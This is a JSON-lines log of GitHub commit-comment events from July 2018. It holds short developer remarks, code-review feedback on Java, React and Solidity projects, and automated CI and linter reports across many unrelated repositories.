{"id":"7998628562","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29788666,"position":null,"line":null,"path":null,"commit_id":"f454036d6a47f892a3a4c8191f4e990171590905","created_at":"2018-07-21T13:41:59Z","updated_at":"2018-07-21T13:41:59Z","author_association":"OWNER","body":"↓here is the fundamental commit of this fix ...\r\nhttps://github.com/shingoushori/simutrans/commit/54bfdc6f5df42acf98c14c0301f9daf4f65494f0"}},"created_at":"2018-07-21T13:41:59Z"}
{"id":"7998628857","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788667,"position":111,"line":111,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:42:14Z","updated_at":"2018-07-21T13:42:14Z","author_association":"OWNER","body":"oh, right - good point"}},"created_at":"2018-07-21T13:42:14Z"}
{"id":"7998631006","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"gohugoio/hugoThemes"},"payload":{"comment":{"id":29788671,"position":null,"line":null,"path":null,"commit_id":"ef50a91d200fbe6820f0ba7146999337789dd1b8","created_at":"2018-07-21T13:43:58Z","updated_at":"2018-07-21T13:43:58Z","author_association":"NONE","body":"![saying goodbye quotes](https://user-images.githubusercontent.com/440298/43036192-28300ccc-8d2f-11e8-884c-6deafab45478.png)\r\n"}},"created_at":"2018-07-21T13:43:58Z"}
{"id":"7998631482","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788672,"position":5,"line":5,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:44:22Z","updated_at":"2018-07-21T13:44:22Z","author_association":"OWNER","body":"yep, makes sense..."}},"created_at":"2018-07-21T13:44:22Z"}
{"id":"7998632962","type":"CommitCommentEvent","actor":{"login":"meteerogl"},"repo":{"name":"meteerogl/kanbagis"},"payload":{"comment":{"id":29788676,"position":48,"line":38,"path":"src/main/webapp/userPage.xhtml","commit_id":"70d36ff4e6263b280a4cd88c99aaf8f4be6b0b75","created_at":"2018-07-21T13:45:35Z","updated_at":"2018-07-21T13:45:35Z","author_association":"OWNER","body":"bilgileri güncelle"}},"created_at":"2018-07-21T13:45:35Z"}
{"id":"7998633354","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788677,"position":17,"line":17,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:45:55Z","updated_at":"2018-07-21T13:45:55Z","author_association":"OWNER","body":"good point"}},"created_at":"2018-07-21T13:45:55Z"}
{"id":"7998634285","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788679,"position":27,"line":27,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:46:39Z","updated_at":"2018-07-21T13:46:39Z","author_association":"OWNER","body":"will switch to ints"}},"created_at":"2018-07-21T13:46:39Z"}
{"id":"7998634426","type":"CommitCommentEvent","actor":{"login":"gulios"},"repo":{"name":"hieplpvip/ASUS-ZENBOOK-UX410-HACKINTOSH"},"payload":{"comment":{"id":29788680,"position":null,"line":null,"path":null,"commit_id":"c2841ecaa39ee73495a6d8bb88aa0e9aaa2d0e74","created_at":"2018-07-21T13:46:47Z","updated_at":"2018-07-21T13:46:47Z","author_association":"NONE","body":"Hi, \r\n\r\nWhat did you changed? Are gestures better now or some new ?\r\nIs it compatible with 10.14 ?\r\n\r\nThank you"}},"created_at":"2018-07-21T13:46:47Z"}
{"id":"7998634667","type":"CommitCommentEvent","actor":{"login":"Yoojin99"},"repo":{"name":"Yoojin99/Unity-project"},"payload":{"comment":{"id":29788683,"position":null,"line":null,"path":null,"commit_id":"1cf95228499f537ee89b5de7e49321efc6b0eb83","created_at":"2018-07-21T13:46:59Z","updated_at":"2018-07-21T13:46:59Z","author_association":"OWNER","body":"앗 이거 제 계정으로 올렸는데 왜 다른사람 걸로 올려졌는지 모르겠어요 ㅠㅠㅠ 근데 이거 이렇게 올리는 게 맞을까요"}},"created_at":"2018-07-21T13:46:59Z"}
{"id":"7998635705","type":"CommitCommentEvent","actor":{"login":"normas87"},"repo":{"name":"witkowski/javaszc4"},"payload":{"comment":{"id":29788686,"position":null,"line":null,"path":null,"commit_id":"6fe1d0502eaed78d1f21ff0c2224bb93ad3487fe","created_at":"2018-07-21T13:47:51Z","updated_at":"2018-07-21T13:47:51Z","author_association":"COLLABORATOR","body":"co tu się wyprawia ?"}},"created_at":"2018-07-21T13:47:51Z"}
{"id":"7998636339","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"gohugoio/hugoThemes"},"payload":{"comment":{"id":29788687,"position":null,"line":null,"path":null,"commit_id":"ef50a91d200fbe6820f0ba7146999337789dd1b8","created_at":"2018-07-21T13:48:23Z","updated_at":"2018-07-21T13:48:23Z","author_association":"NONE","body":"![poohbye](https://user-images.githubusercontent.com/440298/43036221-b56981ae-8d2f-11e8-9d4c-42748ec2df01.png)\r\n\r\nMy door is always open: https://keybase.io/jhabdas"}},"created_at":"2018-07-21T13:48:23Z"}
{"id":"7998638689","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29788691,"position":9,"line":3691,"path":"dietpi/dietpi-software","commit_id":"37d3cb6dbc7c157e0e5a82eaf1a80bea2c384e0c","created_at":"2018-07-21T13:50:16Z","updated_at":"2018-07-21T13:50:16Z","author_association":"COLLABORATOR","body":"@Fourdee \r\n`php-sqlite` is AFAIK never used without installed SQLite. I just tested on 3 VMs and Koel does not require it. The error message you faced shows up, if `/etc/php/7.0/.../XX-sqlite.ini` is present, but the package not installed. I guess, also according to the other error messages, that you had another (broken/not fully purged) PHP installation. If a software title requires a specific PHP module, the error message would look different. Just to prove Koel requirements: https://koel.phanan.net/docs/#/\r\n\r\nI would reduce default PHP packages and move installation/activation of additional modules to the related software installations. This also prevents errors, if users manually remove/disable unused PHP modules."}},"created_at":"2018-07-21T13:50:16Z"}
{"id":"7998639395","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29788695,"position":null,"line":null,"path":null,"commit_id":"5ef43f96501d873d6fc9a2ea66bad63cef7fee30","created_at":"2018-07-21T13:50:48Z","updated_at":"2018-07-21T13:50:48Z","author_association":"CONTRIBUTOR","body":"In the LT snapshot 2018-07-20, testrules (for English) gives warnings for some examples in DATE_WEEKDAY_WITHOUT_YEAR. The Maven tests on my GitHub clone give no warnings.\r\n\r\nI tried to change the examples, but there was strange behaviour. In the LT snapshot, I changed some examples to prevent the testrules warnings. Then, I copied the rulegroup to my GitHub clone. But, the Maven tests gave warnings.\r\n\r\n"}},"created_at":"2018-07-21T13:50:48Z"}
{"id":"7998640193","type":"CommitCommentEvent","actor":{"login":"alexcjohnson"},"repo":{"name":"plotly/plotly.js"},"payload":{"comment":{"id":29788697,"position":35,"line":791,"path":"src/plots/plots.js","commit_id":"efc9fafcdc09f37bdf3805ff658f12e99c6319e1","created_at":"2018-07-21T13:51:23Z","updated_at":"2018-07-21T13:51:23Z","author_association":"CONTRIBUTOR","body":":tada: there’s probably a lesson here, if we need `selectAll('*')` we’re doing things wrong 😏"}},"created_at":"2018-07-21T13:51:23Z"}
{"id":"7998641045","type":"CommitCommentEvent","actor":{"login":"Yoonix83"},"repo":{"name":"Yoonix83/SpringStudy"},"payload":{"comment":{"id":29788699,"position":null,"line":null,"path":null,"commit_id":"e32f438d47699acbb7b71fd28e96293ce6314cc6","created_at":"2018-07-21T13:52:05Z","updated_at":"2018-07-21T13:52:05Z","author_association":"OWNER","body":"필기노트 : 0721 06. 삭제/수정 처리 추가"}},"created_at":"2018-07-21T13:52:05Z"}
{"id":"7998641191","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29788700,"position":13,"line":351,"path":"src/model.ts","commit_id":"3feb9cf9f65537abc7e24dfed418e4b5645ee490","created_at":"2018-07-21T13:52:11Z","updated_at":"2018-07-21T13:52:11Z","author_association":"MEMBER","body":"You are right. But you shouldn't remove the line `this.slim = false;`. We have to notify the `modelListeners` in order to finish the model initialization. \r\n\r\ne.g.\r\nhttps://github.com/bs-community/skinview3d/blob/16d0e8f8eaa6eaa32691738567319269bf563c40/src/model.ts#L129-L154"}},"created_at":"2018-07-21T13:52:11Z"}
{"id":"7998641520","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788701,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:52:25Z","updated_at":"2018-07-21T13:52:25Z","author_association":"OWNER","body":"*Deteket report:*/n "}},"created_at":"2018-07-21T13:52:25Z"}
{"id":"7998641642","type":"CommitCommentEvent","actor":{"login":"RafaelSa94"},"repo":{"name":"hbgit/Map2Check"},"payload":{"comment":{"id":29788702,"position":null,"line":null,"path":null,"commit_id":"948cf078dd39430e56e7f0a5bc14908cce753936","created_at":"2018-07-21T13:52:31Z","updated_at":"2018-07-21T13:52:31Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [T-Hard: Create script to generate integrated release from docker/travis](https://trello.com/c/xzPuT3Q8/50-t-hard-create-script-to-generate-integrated-release-from-docker-travis)"}},"created_at":"2018-07-21T13:52:31Z"}
{"id":"7998641821","type":"CommitCommentEvent","actor":{"login":"PatrickMag"},"repo":{"name":"Laurux/Laurux"},"payload":{"comment":{"id":29788703,"position":null,"line":null,"path":null,"commit_id":"92fb8cc0a5890630b7cc86825c5afc81fae1665a","created_at":"2018-07-21T13:52:40Z","updated_at":"2018-07-21T13:52:40Z","author_association":"COLLABORATOR","body":"@damscot le recalcule du sha1 n'a pas lieu d'être sur le lettrage, ici si on saisie un numéro de lot différent pas le lettrage ne se fait pas, est-ce la bonne façon de faire ?"}},"created_at":"2018-07-21T13:52:40Z"}
{"id":"7998643216","type":"CommitCommentEvent","actor":{"login":"Yoonix83"},"repo":{"name":"Yoonix83/SpringStudy"},"payload":{"comment":{"id":29788707,"position":null,"line":null,"path":null,"commit_id":"e32f438d47699acbb7b71fd28e96293ce6314cc6","created_at":"2018-07-21T13:53:47Z","updated_at":"2018-07-21T13:53:47Z","author_association":"OWNER","body":"- 추가 사항 -\r\n\r\n> BoardController :\r\nremove , modifyGET, modifyPOST\r\n\r\n> JSP :\r\nmodify.jsp"}},"created_at":"2018-07-21T13:53:47Z"}
{"id":"7998644847","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29788711,"position":null,"line":null,"path":null,"commit_id":"a02f85b9c9d25570fa03117fc465f46a05d61857","created_at":"2018-07-21T13:55:03Z","updated_at":"2018-07-21T13:55:03Z","author_association":"OWNER","body":"Build version: __`3.0.1-master.79`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/79) :tada:"}},"created_at":"2018-07-21T13:55:03Z"}
{"id":"7998645528","type":"CommitCommentEvent","actor":{"login":"EeToSe"},"repo":{"name":"EeToSe/PythonLearing"},"payload":{"comment":{"id":29788713,"position":null,"line":null,"path":null,"commit_id":"fc084d87a74eebd6c64462b94296a12d8c77a50d","created_at":"2018-07-21T13:55:33Z","updated_at":"2018-07-21T13:55:33Z","author_association":"OWNER","body":"Try to find how to skip a line"}},"created_at":"2018-07-21T13:55:33Z"}
{"id":"7998645659","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788714,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:55:40Z","updated_at":"2018-07-21T13:55:40Z","author_association":"NONE","body":"It does still catch as Exception, but it prints the full stack trace like an uncaught exception. ItemExchange is weird because in catching Exception, it throws another, new kind of exception:\r\n\r\n```java\r\n// If any of the above code fails, then it's an invalid rule string\r\ncatch (Exception e) {\r\n    throw new ExchangeRuleParseException(\"Unable to parse exchange rule. (\" + e.getMessage() + \" - \" + e.getLocalizedMessage() + \")\");\r\n}\r\n```\r\n\r\nThe code snippet I gave you before in my last reply is what my code currently is. I'm not sure what I'd do differently if I had multiple catches for each specific kind of exception... any ideas?"}},"created_at":"2018-07-21T13:55:40Z"}
{"id":"7998645667","type":"CommitCommentEvent","actor":{"login":"jacobseiler"},"repo":{"name":"jacobseiler/genesis"},"payload":{"comment":{"id":29788715,"position":143,"line":401,"path":"genesis/utils/converter.py","commit_id":"11f518548b4e4406afeff0a55c266c226c3b1b41","created_at":"2018-07-21T13:55:41Z","updated_at":"2018-07-21T13:55:41Z","author_association":"OWNER","body":"@manodeep `forests_to_process` is the number of forests at the root snapshot.  `NForests` is the total number of forests across all snapshots.  Theres two numbers differ (`Forests from unique 1388062. Forest from keys 1938649`) showing that we have 'dangling' halos that aren't connected to the root redshift. \r\n\r\nWill these require special treatment? I can't remember off the top of my head how base `SAGE` deals with these...\r\n"}},"created_at":"2018-07-21T13:55:41Z"}
{"id":"7998645896","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788716,"position":10,"line":10,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConfigItemEnchantments.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:55:51Z","updated_at":"2018-07-21T13:55:51Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T13:55:51Z"}
{"id":"7998646196","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788717,"position":6,"line":6,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstEnchantmentOffer.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:56:03Z","updated_at":"2018-07-21T13:56:03Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T13:56:03Z"}
{"id":"7998647029","type":"CommitCommentEvent","actor":{"login":"duraiMuruganTY"},"repo":{"name":"gepb2603/ProgrammingAssignment2"},"payload":{"comment":{"id":29788718,"position":74,"line":59,"path":"cachematrix.R","commit_id":"20bd9847d8890ce22374c55e454ba051aca3b271","created_at":"2018-07-21T13:56:38Z","updated_at":"2018-07-21T13:56:38Z","author_association":"NONE","body":"solve itself returns inverse matrix. If solve(data) %*% data is used, Identity matrix will be returned"}},"created_at":"2018-07-21T13:56:38Z"}
{"id":"7998647283","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29788719,"position":null,"line":null,"path":null,"commit_id":"4e1850513b14f1debf15d51036b27f93d4d587dd","created_at":"2018-07-21T13:56:50Z","updated_at":"2018-07-21T13:56:50Z","author_association":"MEMBER","body":"yay!"}},"created_at":"2018-07-21T13:56:50Z"}
{"id":"7998649667","type":"CommitCommentEvent","actor":{"login":"enzobes"},"repo":{"name":"enzobes/WarezBot"},"payload":{"comment":{"id":29788726,"position":null,"line":null,"path":null,"commit_id":"d18f7dc27389573518fcd4193ae2d308feceadfd","created_at":"2018-07-21T13:58:37Z","updated_at":"2018-07-21T13:58:37Z","author_association":"OWNER","body":"Last version for Layer13  "}},"created_at":"2018-07-21T13:58:37Z"}
{"id":"7998649804","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788727,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:58:43Z","updated_at":"2018-07-21T13:58:43Z","author_association":"OWNER","body":"zzz"}},"created_at":"2018-07-21T13:58:43Z"}
{"id":"7998650700","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788729,"position":31,"line":31,"path":"src/components/rootComponent.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T13:59:21Z","updated_at":"2018-07-21T13:59:21Z","author_association":"NONE","body":"Kontam da nemaš neki razlog da ovo bude posebna komponenta. Čini mi se da je sve to moglo u App.js."}},"created_at":"2018-07-21T13:59:21Z"}
{"id":"7998651448","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788731,"position":8,"line":8,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstEnchantmentOffer.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:59:51Z","updated_at":"2018-07-21T13:59:51Z","author_association":"NONE","body":"Yeah, personally I don't see the difference between `public final int cost;` and `public int getCost();` =/ Maybe the encapsulation argument is correct but imo if Minecraft's enchanting system changes so substantially to not use level costs in the same way, then the entire plugin will probably need a re-write and so this class would probably not keep its `getCost()` method anyway. Either way, done."}},"created_at":"2018-07-21T13:59:51Z"}
{"id":"7998652394","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788742,"position":11,"line":11,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstLeveledEnchantment.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:00:25Z","updated_at":"2018-07-21T14:00:25Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T14:00:25Z"}
{"id":"7998658546","type":"CommitCommentEvent","actor":{"login":"miker677"},"repo":{"name":"miker677/cs490-prod-system-interface"},"payload":{"comment":{"id":29788751,"position":30,"line":481,"path":"inventory.html","commit_id":"e8ef85d1af8ce06137667ce44f43111b5e13f9ec","created_at":"2018-07-21T14:05:11Z","updated_at":"2018-07-21T14:05:11Z","author_association":"OWNER","body":"@rajashravan  Can you just remove the search feature from the table then? We can prevent accidental clicking that way."}},"created_at":"2018-07-21T14:05:11Z"}
{"id":"7998658614","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29788752,"position":5,"line":3661,"path":"dietpi/dietpi-software","commit_id":"4e0efa706ef4ea10330f96255ea433c7f9a36010","created_at":"2018-07-21T14:05:13Z","updated_at":"2018-07-21T14:05:13Z","author_association":"COLLABORATOR","body":"@Fourdee \r\n`php-cli` is dependency of `libapache2-mod-php` and `php-fpm`, thus no need to manually install it. As said on the other commit, I guess you had a broken PHP installation left when you faced the errors. We could `rm -R /etc/php*` when uninstalling PHP.\r\n\r\nHowever there are several software packages, that require PHP, but no webserver and no php-fpm/mod-ph, e.g. Koel. Those require `php-cli` then, which includes the `/usr/bin/php`."}},"created_at":"2018-07-21T14:05:13Z"}
{"id":"7998658779","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.alterego"},"payload":{"comment":{"id":29788753,"position":null,"line":null,"path":null,"commit_id":"50f2c7888c6d556f15d2d23e23451a7446b09582","created_at":"2018-07-21T14:05:21Z","updated_at":"2018-07-21T14:05:21Z","author_association":"NONE","body":"@gforcada Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.alterego/15/violations\n```\nplone/alterego/dynamic.py:26:18: C812 missing trailing comma\nplone/alterego/dynamic.py:33:57: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-21T14:05:21Z"}
{"id":"7998659257","type":"CommitCommentEvent","actor":{"login":"aschiavon91"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29788754,"position":null,"line":null,"path":null,"commit_id":"058f8ae3b8956f9f43bd21c079353249440b94a0","created_at":"2018-07-21T14:05:45Z","updated_at":"2018-07-21T14:05:45Z","author_association":"NONE","body":"![](http://www.reactiongifs.com/wp-content/uploads/2013/11/thank-you.gif)"}},"created_at":"2018-07-21T14:05:45Z"}
{"id":"7998659742","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788755,"position":20,"line":20,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:06:09Z","updated_at":"2018-07-21T14:06:09Z","author_association":"NONE","body":"True, and that is what I did for EnchantmentEvents.java, essentially try to make the function as flat as possible. But here I'd have to disagree. I've still changed it as you've recommended, but personally I find this far less readable. If anything, I'd rather just do a `Validate.notNull(table, \"Table cannot be null!\");` rather than that if statement."}},"created_at":"2018-07-21T14:06:09Z"}
{"id":"7998660432","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788756,"position":5,"line":5,"path":"src/reducers/intervalReducer.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:06:40Z","updated_at":"2018-07-21T14:06:40Z","author_association":"NONE","body":"Stavi mu neke početne vrednosti da ne bude zapucan ili još bolje uvedi neki isFetching (boolean) property u state-u, pa na osnovu njega možeš da prikažeš loader dok se dovlače podaci - kako inicijalno, tako i posle kad _user_ pomera slider(e)."}},"created_at":"2018-07-21T14:06:40Z"}
{"id":"7998661122","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788757,"position":6,"line":6,"path":"src/reducers/index.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:07:10Z","updated_at":"2018-07-21T14:07:10Z","author_association":"NONE","body":"Ako imaš samo jedan reducer, ne moraš ovo da radiš. Al' svakako ne smeta."}},"created_at":"2018-07-21T14:07:10Z"}
{"id":"7998662297","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788759,"position":10,"line":10,"path":"src/store.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:08:06Z","updated_at":"2018-07-21T14:08:06Z","author_association":"NONE","body":"Ovo puca, ako nemaš redux dev tools. Ima neki issue za to, čačkao sam po github-u, ali svakako treba da zaštitiš da može da radi i bez njega."}},"created_at":"2018-07-21T14:08:06Z"}
{"id":"7998662899","type":"CommitCommentEvent","actor":{"login":"XXZs"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29788761,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-21T14:08:34Z","updated_at":"2018-07-21T14:08:34Z","author_association":"NONE","body":"我坚信蓝灯一定会满血复活的，因为已经重复n次了"}},"created_at":"2018-07-21T14:08:34Z"}
{"id":"7998663557","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788762,"position":7,"line":9,"path":"src/components/rangeslider.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:09:07Z","updated_at":"2018-07-21T14:09:07Z","author_association":"NONE","body":"Let it be dumb component! 😄"}},"created_at":"2018-07-21T14:09:07Z"}
{"id":"7998666410","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788765,"position":28,"line":28,"path":"src/actions/intervalAction.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:11:19Z","updated_at":"2018-07-21T14:11:19Z","author_association":"NONE","body":"Možda bolje da ovo budu dve posebne akcije ili bar neka bude _else if_.  Ovako ti fallback-uje na amount uvek, što možda nije mudro."}},"created_at":"2018-07-21T14:11:19Z"}
{"id":"7998666727","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788768,"position":24,"line":24,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:11:32Z","updated_at":"2018-07-21T14:11:32Z","author_association":"NONE","body":"As mentioned on Discord, the function I used here is directly copied from decompiled server code, and so I'm hesitant to move away from it, even if it is horrendously ugly. Have you tested that the resulting behaviour is identical?"}},"created_at":"2018-07-21T14:11:32Z"}
{"id":"7998666866","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788769,"position":23,"line":23,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:11:39Z","updated_at":"2018-07-21T14:11:39Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T14:11:39Z"}
{"id":"7998668545","type":"CommitCommentEvent","actor":{"login":"yangchangdong"},"repo":{"name":"yangchangdong/ycd"},"payload":{"comment":{"id":29788770,"position":null,"line":null,"path":null,"commit_id":"dbf078a515723f3c32f47b551014a477c334cebe","created_at":"2018-07-21T14:12:58Z","updated_at":"2018-07-21T14:12:58Z","author_association":"OWNER","body":"fd"}},"created_at":"2018-07-21T14:12:58Z"}
{"id":"7998669095","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788771,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T14:13:24Z","updated_at":"2018-07-21T14:13:24Z","author_association":"OWNER","body":"MagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt"}},"created_at":"2018-07-21T14:13:24Z"}
{"id":"7998670203","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29788772,"position":1,"line":null,"path":"1532182451.65/github_test.txt","commit_id":"8c7112cd6bf08cdbac372a4435912b9455f1fa75","created_at":"2018-07-21T14:14:13Z","updated_at":"2018-07-21T14:14:13Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-21T14:14:13Z"}
{"id":"7998670205","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788773,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T14:14:13Z","updated_at":"2018-07-21T14:14:13Z","author_association":"OWNER","body":"- MagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt"}},"created_at":"2018-07-21T14:14:13Z"}
{"id":"7998671087","type":"CommitCommentEvent","actor":{"login":"ElGatoLoco"},"repo":{"name":"shomi2302/react_calc"},"payload":{"comment":{"id":29788776,"position":1,"line":3,"path":"src/components/rangeslider.js","commit_id":"17e6b9a6d7603f98fe3338da2513ddaa853fa46d","created_at":"2018-07-21T14:14:52Z","updated_at":"2018-07-21T14:14:52Z","author_association":"NONE","body":"Kontam da si hteo da ti ovo izgleda lepše, ali mislim da ti ne treba nova biblioteka zbog toga. Input type range radi posao."}},"created_at":"2018-07-21T14:14:52Z"}
{"id":"7998671737","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/FireAPI"},"payload":{"comment":{"id":29788780,"position":null,"line":null,"path":null,"commit_id":"0feaa2dc2c062934373d22eebe820f32d4181abe","created_at":"2018-07-21T14:15:21Z","updated_at":"2018-07-21T14:15:21Z","author_association":"MEMBER","body":"C'est moi ^^"}},"created_at":"2018-07-21T14:15:21Z"}
{"id":"7998674207","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788781,"position":110,"line":110,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T14:17:08Z","updated_at":"2018-07-21T14:17:08Z","author_association":"NONE","body":"Spoke about this on Discord. Done?"}},"created_at":"2018-07-21T14:17:08Z"}
